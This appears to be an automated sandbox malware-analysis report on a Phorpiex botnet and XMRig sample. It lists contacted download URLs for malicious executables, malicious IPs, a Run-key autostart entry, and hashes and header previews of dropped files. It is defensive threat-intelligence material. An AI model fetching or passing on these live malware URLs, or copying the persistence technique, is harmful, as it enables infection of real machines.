http://185.215.113.66/pei.exeQQC: | thcdVit1dX.exe, 00000000.00000002.2189354582.000000000289D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y | thcdVit1dX.exe | false | URL Reputation: safe | unknown
http://185.215.113.66/FYL | sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://twizt.net/peinstall.php%temp%%s | thcdVit1dX.exe, 00000000.00000002.2189354582.00000000028CF000.00000004.00000020.00020000.00000000.sdmp, 4BBF.exe, 00000002.00000002.2288610802.0000000000C92000.00000002.00000001.01000000.00000006.sdmp, 4BBF.exe, 00000002.00000000.2188723249.0000000000C92000.00000002.00000001.01000000.00000006.sdmp, pei[1].exe.0.dr, 4BBF.exe.0.dr | true | | unknown
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z | thcdVit1dX.exe | false | URL Reputation: safe | unknown
http://91.202.233.141/dwntblZ | sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://twizt.net/newtpp.exeP0 | thcdVit1dX.exe, 00000000.00000002.2189354582.00000000028CF000.00000004.00000020.00020000.00000000.sdmp, 4BBF.exe, 00000002.00000002.2288610802.0000000000C92000.00000002.00000001.01000000.00000006.sdmp, 4BBF.exe, 00000002.00000000.2188723249.0000000000C92000.00000002.00000001.01000000.00000006.sdmp, pei[1].exe.0.dr, 4BBF.exe.0.dr | true | | unknown
http://twizt.net/peinstall.phpystem32 | 4BBF.exe, 00000002.00000002.2288265241.0000000000A74000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.66/tdrp.exe | sysppvrdnvs.exe | false | | unknown
http://twizt.net/peinstall.phpQZ | 4BBF.exe, 00000002.00000002.2288265241.0000000000A89000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://twizt.net/newtpp.exe | 4BBF.exe, 00000002.00000002.2288265241.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://twizt.net/peinstall.php | thcdVit1dX.exe, 00000000.00000002.2189354582.00000000028CF000.00000004.00000020.00020000.00000000.sdmp, 4BBF.exe, 4BBF.exe, 00000002.00000002.2288265241.0000000000A89000.00000004.00000020.00020000.00000000.sdmp, 4BBF.exe, 00000002.00000002.2288265241.0000000000A74000.00000004.00000020.00020000.00000000.sdmp, 4BBF.exe, 00000002.00000002.2288610802.0000000000C92000.00000002.00000001.01000000.00000006.sdmp, 4BBF.exe, 00000002.00000000.2188723249.0000000000C92000.00000002.00000001.01000000.00000006.sdmp, pei[1].exe.0.dr, 4BBF.exe.0.dr | true | | unknown
http://appsyndication.org/2006/appsyn | thcdVit1dX.exe | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.66 | twizt.net | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
195.82.3.15 | unknown | Kazakhstan | 9198 | KAZTELECOM-ASKZ | true
89.33.234.8 | unknown | Iran (ISLAMIC Republic Of) | 136384 | OPTIX-AS-APOptixPakistanPvtLimitedPK | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
2.180.10.247 | unknown | Iran (ISLAMIC Republic Of) | 58224 | TCIIR | true
89.249.62.7 | unknown | Russian Federation | 50164 | RFTV-ASRU | false
149.54.47.90 | unknown | Afghanistan | 174 | COGENT-174US | false
2.184.189.189 | unknown | Iran (ISLAMIC Republic Of) | 58224 | TCIIR | true
91.202.233.141 | unknown | Russian Federation | 9009 | M247GB | true
151.246.159.157 | unknown | Iran (ISLAMIC Republic Of) | 31549 | RASANAIR | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1542686
Start date and time: 2024-10-26 07:25:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 26s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: thcdVit1dX.exe (renamed because original name is a hash value)
Original Sample Name: 6b9670cd01edbc5d5f1aa015fd976155660f8a7227f2c1a8d5dc6eaa7fe9a772.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@41/21@1/10
EGA Information:
• Successful, ratio: 100%
                                                                                                          HCA Information:
                                                                                                          • Successful, ratio: 100%
                                                                                                          • Number of executed functions: 50
                                                                                                          • Number of non-executed functions: 289
                                                                                                          Cookbook Comments:
                                                                                                          • Found application associated with file extension: .exe
                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                          • Excluded IPs from analysis (whitelisted): 20.190.160.14, 40.126.32.74, 40.126.32.72, 40.126.32.138, 40.126.32.133, 20.190.160.17, 40.126.32.76, 40.126.32.68, 20.109.209.108
                                                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, redir.update.msft.com.trafficmanager.net, ocsp.digicert.com, login.live.com, www.update.microsoft.com, ocsp.edge.digicert.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:26:27 | API Interceptor | 3x Sleep call for process: sysppvrdnvs.exe modified
01:26:27 | API Interceptor | 14x Sleep call for process: powershell.exe modified
07:26:28 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Windows Settings C:\Windows\sysppvrdnvs.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.66 | bBcZoComLl.exe | malicious | Phorpiex, Xmrig | 185.215.113.66/4
185.215.113.66 | file.exe | malicious | Phorpiex, Xmrig | 185.215.113.66/5
185.215.113.66 | dgiX55cHyU.exe | malicious | Phorpiex, Xmrig | 185.215.113.66/5
185.215.113.66 | GGXhCiYFBw.exe | malicious | Phorpiex, Xmrig | 185.215.113.66/5
185.215.113.66 | 0NSjUT34gS.exe | malicious | Phorpiex, Xmrig | 185.215.113.66/5
185.215.113.66 | file.exe | malicious | Phorpiex | 185.215.113.66/3
185.215.113.66 | SecuriteInfo.com.Trojan.DownLoader46.2135.11116.25434.exe | malicious | Phorpiex | 185.215.113.66/2
185.215.113.66 | file.exe | malicious | Phorpiex | 185.215.113.66/6
185.215.113.66 | file.exe | malicious | Phorpiex | 185.215.113.66/1
185.215.113.66 | file.exe | malicious | Phorpiex | 185.215.113.66/4
239.255.255.250 | https://load.aberegg-immobilien.ch/ | malicious | HTMLPhisher |
239.255.255.250 | http://fleurifleuri.com/ | malicious | Unknown |
239.255.255.250 | http://mychronictravel.eu.org/ | malicious | Unknown |
239.255.255.250 | https://louisianalaw.us/awI1AlsoTxn2APQ3EspQ3E4RAI1AoTxnz01coTxm&c=E,1,vvMSQz5CSzvUF_pnZgRSmb_4_6IhFVsFaIdJFKN2k78xDXcVLKO_NH-275AIvCQYfKD3jL3qc4bCIgEC2N6Rr4xli-ez6GBrwxbUrVz5hy4g&typo=1 | malicious | Unknown |
239.255.255.250 | https://certify.us.com/D5QkoQ3Eniw4G2APQ3ED5QpQ3E4RAionz01coq01 | malicious | Unknown |
239.255.255.250 | https://deborahmeagher.com.de/kfOoB/ | malicious | HTMLPhisher |
239.255.255.250 | Rob.Kuster@stonhard.com.zip | malicious | HTMLPhisher, Mamba2FA |
239.255.255.250 | Bill Payment__8084746.html | malicious | Unknown |
239.255.255.250 | zip file.zip | malicious | HTMLPhisher, Mamba2FA |

Match | Associated Sample Name / URL | Detection | Threat Name | Context
twizt.net | dgiX55cHyU.exe | malicious | Phorpiex, Xmrig | 185.215.113.66
twizt.net | SecuriteInfo.com.Trojan.DownLoader46.2135.13298.13900.exe | malicious | Phorpiex, Xmrig | 185.215.113.66
twizt.net | qRavA0Sorz.exe | malicious | Unknown | 185.215.113.66
twizt.net | qRavA0Sorz.exe | malicious | Unknown | 185.215.113.66
twizt.net | SecuriteInfo.com.Trojan.DownLoader46.63386.25844.4041.exe | malicious | Phorpiex, Xmrig | 185.215.113.66
twizt.net | SecuriteInfo.com.Trojan.DownLoader46.2135.7325.13890.exe | malicious | Phorpiex, Xmrig | 185.215.113.66
twizt.net | BFP2Kvubpo.exe | malicious | Phorpiex | 185.215.113.66
twizt.net | WI6a5vSCOb.exe | malicious | Phorpiex | 185.215.113.66
twizt.net | xJd712XMG6.exe | malicious | Phorpiex | 185.215.113.66
twizt.net | lRT1FK9PcL.exe | malicious | Phorpiex | 185.215.113.66
bg.microsoft.map.fastly.net | http://mychronictravel.eu.org/ | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | https://louisianalaw.us/awI1AlsoTxn2APQ3EspQ3E4RAI1AoTxnz01coTxm&c=E,1,vvMSQz5CSzvUF_pnZgRSmb_4_6IhFVsFaIdJFKN2k78xDXcVLKO_NH-275AIvCQYfKD3jL3qc4bCIgEC2N6Rr4xli-ez6GBrwxbUrVz5hy4g&typo=1 | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | http://usps.com-taroper.top/us | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | http://ERICADLERCLOTHING.com | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | tue.bat | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | Qjq85KfhBC.exe | malicious | ScreenConnect Tool | 199.232.210.172
bg.microsoft.map.fastly.net | xrWUzly94Z.exe | malicious | ScreenConnect Tool | 199.232.214.172
bg.microsoft.map.fastly.net | EPCo9k8NIn.exe | malicious | ScreenConnect Tool | 199.232.214.172
bg.microsoft.map.fastly.net | X5zNv1VJia.exe | malicious | ScreenConnect Tool | 199.232.214.172
fp2e7a.wpc.phicdn.net | http://mychronictravel.eu.org/ | malicious | Unknown | 192.229.221.95
fp2e7a.wpc.phicdn.net | https://louisianalaw.us/awI1AlsoTxn2APQ3EspQ3E4RAI1AoTxnz01coTxm&c=E,1,vvMSQz5CSzvUF_pnZgRSmb_4_6IhFVsFaIdJFKN2k78xDXcVLKO_NH-275AIvCQYfKD3jL3qc4bCIgEC2N6Rr4xli-ez6GBrwxbUrVz5hy4g&typo=1 | malicious | Unknown | 192.229.221.95
fp2e7a.wpc.phicdn.net | https://certify.us.com/D5QkoQ3Eniw4G2APQ3ED5QpQ3E4RAionz01coq01 | malicious | Unknown | 192.229.221.95
fp2e7a.wpc.phicdn.net | https://deborahmeagher.com.de/kfOoB/ | malicious | HTMLPhisher | 192.229.221.95
fp2e7a.wpc.phicdn.net | http://usps.com-taroper.top/us | malicious | Unknown | 192.229.221.95
fp2e7a.wpc.phicdn.net | http://ERICADLERCLOTHING.com | malicious | Unknown | 192.229.221.95
fp2e7a.wpc.phicdn.net | 3coxOaV92n.exe | malicious | ScreenConnect Tool | 192.229.221.95
fp2e7a.wpc.phicdn.net | khwHsyfsJ1.exe | malicious | ScreenConnect Tool | 192.229.221.95

Match | Associated Sample Name / URL | Detection | Threat Name | Context
OPTIX-AS-APOptixPakistanPvtLimitedPK | la.bot.arm7-20241006-1050.elf | malicious | Unknown | 196.246.205.67
OPTIX-AS-APOptixPakistanPvtLimitedPK | x86.elf | malicious | Mirai | 89.41.59.6
OPTIX-AS-APOptixPakistanPvtLimitedPK | ilwj2dfs9x.elf | malicious | Mirai | 89.41.59.2
OPTIX-AS-APOptixPakistanPvtLimitedPK | KKveTTgaAAsecNNaaaa.x86.elf | malicious | Unknown | 89.37.42.125
OPTIX-AS-APOptixPakistanPvtLimitedPK | arm-20230311-1411.elf | malicious | Mirai, Moobot | 89.41.59.7
OPTIX-AS-APOptixPakistanPvtLimitedPK | cNodufKYLc.elf | malicious | Mirai, Moobot | 196.246.206.184
OPTIX-AS-APOptixPakistanPvtLimitedPK | Gpaw8cp28X | malicious | Mirai | 196.246.206.187
OPTIX-AS-APOptixPakistanPvtLimitedPK | Gs1rwyXsfo.dll | malicious | Wannacry | 89.34.169.143
OPTIX-AS-APOptixPakistanPvtLimitedPK | yRaJVytT27 | malicious | Unknown | 89.41.59.5
OPTIX-AS-APOptixPakistanPvtLimitedPK | 8FSPeGdtio | malicious | Mirai | 196.246.206.181
KAZTELECOM-ASKZ | la.bot.arm.elf | malicious | Unknown | 212.13.160.210
KAZTELECOM-ASKZ | la.bot.mipsel.elf | malicious | Unknown | 178.88.132.57
KAZTELECOM-ASKZ | la.bot.powerpc.elf | malicious | Unknown | 178.91.19.33
KAZTELECOM-ASKZ | la.bot.mips.elf | malicious | Unknown | 5.251.70.189
KAZTELECOM-ASKZ | D9lexQEfnt.elf | malicious | Mirai |
                                                                                                                              • 95.57.208.93
                                                                                                                              ai3eCONS9Q.elfGet hashmaliciousMiraiBrowse
                                                                                                                              • 95.56.47.35
                                                                                                                              la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 95.56.219.244
                                                                                                                              6fLnWSoXXD.elfGet hashmaliciousMiraiBrowse
                                                                                                                              • 95.58.131.5
                                                                                                                              ceTv2SnPn9.elfGet hashmaliciousMiraiBrowse
                                                                                                                              • 95.57.233.54
                                                                                                                              bin.i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                              • 95.57.245.71
                                                                                                                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                              • 185.215.113.16
                                                                                                                              file.exeGet hashmaliciousStealcBrowse
                                                                                                                              • 185.215.113.206
                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                              • 185.215.113.16
                                                                                                                              file.exeGet hashmaliciousStealcBrowse
                                                                                                                              • 185.215.113.206
                                                                                                                              file.exeGet hashmaliciousStealcBrowse
                                                                                                                              • 185.215.113.206
                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                              • 185.215.113.16
                                                                                                                              file.exeGet hashmaliciousStealcBrowse
                                                                                                                              • 185.215.113.206
                                                                                                                              file.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                              • 185.215.113.16
                                                                                                                              file.exeGet hashmaliciousStealcBrowse
                                                                                                                              • 185.215.113.206
                                                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                              • 185.215.113.206
                                                                                                                              TCIIRla.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 2.187.226.161
                                                                                                                              la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 5.219.70.220
                                                                                                                              w18Ys8qKuX.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 151.232.14.120
                                                                                                                              la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 217.219.63.61
                                                                                                                              la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 5.236.134.234
                                                                                                                              la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 217.219.212.240
                                                                                                                              la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 188.215.201.100
                                                                                                                              newsampleGet hashmaliciousMirai, OkiruBrowse
                                                                                                                              • 5.236.182.131
                                                                                                                              o2YUBeMZW6.elfGet hashmaliciousMiraiBrowse
                                                                                                                              • 94.176.15.8
                                                                                                                              x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 5.236.222.220
No context

Dropped file associations (Match / Associated Sample Name / Detection / Threat Name):

Match: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exe
• Associated Sample: file.exe, Detection: malicious, Threat Name: Phorpiex, Xmrig
• Associated Sample: dgiX55cHyU.exe, Detection: malicious, Threat Name: Phorpiex, Xmrig

Match: C:\Users\user\AppData\Local\Temp\2355412914.exe
• Associated Sample: bBcZoComLl.exe, Detection: malicious, Threat Name: Phorpiex, Xmrig
• Associated Sample: file.exe, Detection: malicious, Threat Name: Phorpiex, Xmrig
• Associated Sample: dgiX55cHyU.exe, Detection: malicious, Threat Name: Phorpiex, Xmrig
• Associated Sample: GGXhCiYFBw.exe, Detection: malicious, Threat Name: Phorpiex, Xmrig
• Associated Sample: 0NSjUT34gS.exe, Detection: malicious, Threat Name: Phorpiex, Xmrig
• Associated Sample: bomb.exe, Detection: malicious, Threat Name: Amadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, Vidar

Match: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\pei[1].exe
• Associated Sample: dgiX55cHyU.exe, Detection: malicious, Threat Name: Phorpiex, Xmrig
• Associated Sample: bomb.exe, Detection: malicious, Threat Name: Amadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, Vidar
• Associated Sample: Setup.exe, Detection: malicious, Threat Name: AsyncRAT, HTMLPhisher, Clipboard Hijacker, Phorpiex, PureLog Stealer, Raccoon Stealer v2, RedLine
Process: C:\Users\user\AppData\Local\Temp\2355412914.exe
File Type: CSV text
Category: dropped
Size (bytes): 425
Entropy (8bit): 5.357964438493834
Encrypted: false
SSDEEP: 12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
MD5: D8F8A79B5C09FCB6F44E8CFFF11BF7CA
SHA1: 669AFE705130C81BFEFECD7CC216E6E10E72CB81
SHA-256: 91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
SHA-512: C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..

Process: C:\Windows\sysppvrdnvs.exe
File Type: data
Category: dropped
Size (bytes): 85760
Entropy (8bit): 7.998087239673687
Encrypted: true
SSDEEP: 1536:17wFGypBQDLreXJ4xaX8px3nB7C6RfEysfoVE9iGeL8LNoaZb3raWBL:RwrTQTeXJh8z3nBTqjoGeQCaJu0
MD5: 20493FD87FE8305516142680D848F1CE
SHA1: 8DF2CB6236677885685BA97E328F37CD8F5492D3
SHA-256: FC4A761817120D2DE8B7618833F0EB92410977CF06F4D2A4FB4AF567C40C5DB3
SHA-512: BBBB809C3869B9D28D8CF490B3390B6FD1E6D25DB69BE7FC6EA5ACFA7FF79FB995F43BD113A74BA3FFBFEB32FA3EC0FB971988094EE436DAC283616E3142EC48
Malicious: false

Process: C:\Windows\sysppvrdnvs.exe
File Type: data
Category: dropped
Size (bytes): 8960
Entropy (8bit): 7.980118959451248
Encrypted: false
SSDEEP: 192:8w3f/H9pFkeMpRmPIlHDCEkAH5gWPmEt3TXxl/6LkbgewuNvm:8snHrUVjbHH5g+mEt3z64bdNvm
MD5: 39F45EDB23427EBF63197CA138DDB282
SHA1: 4BE1B15912C08F73687C0E4C74AF0979C17FF7D5
SHA-256: 77FBB0D8630024634880C37DA59CE57D1B38C7E85BDCC14C697DB9E79C24E0DE
SHA-512: 410F6BAAD25B256DAEBFA5D8B8A495429C9E26E7DE767B2A0E6E4A75E543B77DBD0ABCA0335FB1F0D91E49E292B42CEDC6EDD72D25A3C4C62330E2B31C054CC6
Malicious: false

Process: C:\Users\user\AppData\Local\Temp\4BBF.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 85504
Entropy (8bit): 6.394560338648692
Encrypted: false
SSDEEP: 1536:27zFjdFmav82WoPRgMRmtMJXlXXwfAbQaQG9MF7vRjoJrl:yRyO+oPKjoBAIcZF7vqrl
MD5: 06560B5E92D704395BC6DAE58BC7E794
SHA1: FBD3E4AE28620197D1F02BFC24ADAF4DDACD2372
SHA-256: 9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
SHA-512: B55B49FC1BD526C47D88FCF8A20FCAED900BFB291F2E3E1186EC196A87127ED24DF71385AE04FEDCC802C362C4EBF38EDFC182013FEBF4496DDEB66CE5195EE3
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exe, Author: Joe Security
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 82%
Joe Sandbox View:
• Filename: file.exe, Detection: malicious
• Filename: dgiX55cHyU.exe, Detection: malicious
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L......g.....................p......@y............@..........................p..............................................|0.......................................................................................................................text............................... ..`.rdata...?.......@..................@..@.data........@.......2..............@...................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\sysppvrdnvs.exe
File Type: data
Category: dropped
Size (bytes): 110600
Entropy (8bit): 7.998486619051527
Encrypted: true
SSDEEP: 3072:LFQC4AbS79Bo0bTtS3v4P09loyBE7QXNn8IJrF:LFQC4A+7jfiw8HoyYQXdXF
MD5: 1FCB78FB6CF9720E9D9494C42142D885
SHA1: FEF9C2E728AB9D56CE9ED28934B3182B6F1D5379
SHA-256: 84652BB8C63CA4FD7EB7A2D6EF44029801F3057AA2961867245A3A765928DD02
SHA-512: CDF58E463AF1784AEA86995B3E5D6B07701C5C4095E30EC80CC901FFD448C6F4F714C521BF8796FFA8C47538BF8BF5351E157596EFAA7AB88155D63DC33F7DC3
Malicious: false

Process: C:\Users\user\Desktop\thcdVit1dX.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 9728
Entropy (8bit): 5.254547230411213
Encrypted: false
SSDEEP: 96:zMn7AN23D0TXraYgnY1dTNDiIp+BYA8vrcVO15uJxGE9YUBz2qh3C7tCEkC:A7ANUYhUYPtp+OFMJxTmUBzthckC
MD5: 8D8E6C7952A9DC7C0C73911C4DBC5518
SHA1: 9098DA03B33B2C822065B49D5220359C275D5E94
SHA-256: FEB4C3AE4566F0ACBB9E0F55417B61FEFD89DC50A4E684DF780813FB01D61278
SHA-512: 91A573843C28DD32A9F31A60BA977F9A3D4BB19FFD1B7254333E09BCECEF348C1B3220A348EBB2CB08EDB57D56CB7737F026519DA52199C9DC62C10AEA236645
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 66%
                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                     • Filename: dgiX55cHyU.exe, Detection: malicious
                                                                                                                                                     • Filename: bomb.exe, Detection: malicious
                                                                                                                                                     • Filename: Setup.exe, Detection: malicious
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gd.##.`p#.`p#.`p*}.p!.`p*}.p".`p*}.p6.`p...p(.`p#.ap..`p*}.p .`p*}.p".`pRich#.`p................PE..L.....Df..................................... ....@..........................`......?.....@.................................l$.......@.......................P.......................................#..@............ ...............................text...z........................... ..`.rdata..4.... ......................@..@.data........0......................@....rsrc........@....... ..............@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2232
                                                                                                                                                    Entropy (8bit):5.379401388151058
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZSUyus:fLHxvIIwLgZ2KRHWLOugEs
                                                                                                                                                    MD5:E1EE0479D96955B1FB2CC31056370383
                                                                                                                                                    SHA1:34786077993793FCB28FA325740270F5F7F8723E
                                                                                                                                                    SHA-256:20C37B9D9110033848F4AB81E3A860C2B56E1DBBFFB2F361B2FBE9D47F91F967
                                                                                                                                                    SHA-512:91C99CA6000309B28FB7776512B6418F11EDDEC960DDC11FB05B758CD589D1BF1EE1E09C8C5648062F8D750FA211BF115CADF873FAFB810296AC480E60790C54
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                                    Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):110600
                                                                                                                                                    Entropy (8bit):7.998486619051527
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:3072:LFQC4AbS79Bo0bTtS3v4P09loyBE7QXNn8IJrF:LFQC4A+7jfiw8HoyYQXdXF
                                                                                                                                                    MD5:1FCB78FB6CF9720E9D9494C42142D885
                                                                                                                                                    SHA1:FEF9C2E728AB9D56CE9ED28934B3182B6F1D5379
                                                                                                                                                    SHA-256:84652BB8C63CA4FD7EB7A2D6EF44029801F3057AA2961867245A3A765928DD02
                                                                                                                                                    SHA-512:CDF58E463AF1784AEA86995B3E5D6B07701C5C4095E30EC80CC901FFD448C6F4F714C521BF8796FFA8C47538BF8BF5351E157596EFAA7AB88155D63DC33F7DC3
                                                                                                                                                    Malicious:true
                                                                                                                                                    Preview:NGS!.....8y....j...x9"{[&..TL..,..L.nD..70Ln..MP.B..e...'.LpVJ...g...Y....]...h=....Ot(.P:...jjoF.....2y....:.P@.b...6]u...D\..i4<....Q?......._;]..!.A.4.A......1..c.sa^.+dQ!xl.6Q..8w...a7?..].T%:...H.1....$.j.......4f.k!...p.Fz.v..........?l...5...7...(.....=c.s..c.F.{..-.uE.8.D....QF...|.8.ey.3'.@<Kq.."S.-..?..4.s......S..2..j=.e..Le.....Yh....+...[}AM.,.@...gW\..Z)..ET.../|."...b.W........Ro.......j.(|A,....>.?.1;..>......".&.....;u.c.y..[....t..`...w ..#.....c.dyy...s..G.x_C.h...*I]..D....ey...:.FQ.Q...C.. .B.Z.n.2...@X.&>UY.g..D...YZ.)F.!..F...F...e....h4VGK.>.V......3#+.$.,.&.S...lk..I.F\..C.k$).J._l\.",.0u!.k..T....}.V...!..Y.....B....{}.....nAL...[.Xo[+.1\...m.,.^.bLMD.j.-g...... <._8d+-D./.k<..'.....dv...-.Q...i.`........N4W(._"..%.....5q..844o4..g..d..x....s...i.fc.....D..^..].....M(...A..[...gB4..m.w..AV....@.g..5.4.].....BLr!n*....W.G,6+uY..9U.4..........O..P....&....?.....v.K.i..>X...7Dt...o=.2........f....bi..C.5N.>.7lf.......^..@F.O
                                                                                                                                                    Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):8704
                                                                                                                                                    Entropy (8bit):5.0125514402992275
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:Otk3w0++KjlRC5vVkDlBj9k2cugyJBLCsZ:OEYjlRAGlBj9kSgiLC0
                                                                                                                                                    MD5:CB8420E681F68DB1BAD5ED24E7B22114
                                                                                                                                                    SHA1:416FC65D538D3622F5CA71C667A11DF88A927C31
                                                                                                                                                    SHA-256:5850892F67F85991B31FC90F62C8B7791AFEB3C08AE1877D857AA2B59471A2EA
                                                                                                                                                    SHA-512:BAAABCC4AD5D409267A34ED7B20E4AFB4D247974BFC581D39AAE945E5BF8A673A1F8EACAE2E6783480C8BAAEB0A80D028274A202D456F13D0AF956AFA0110FDF
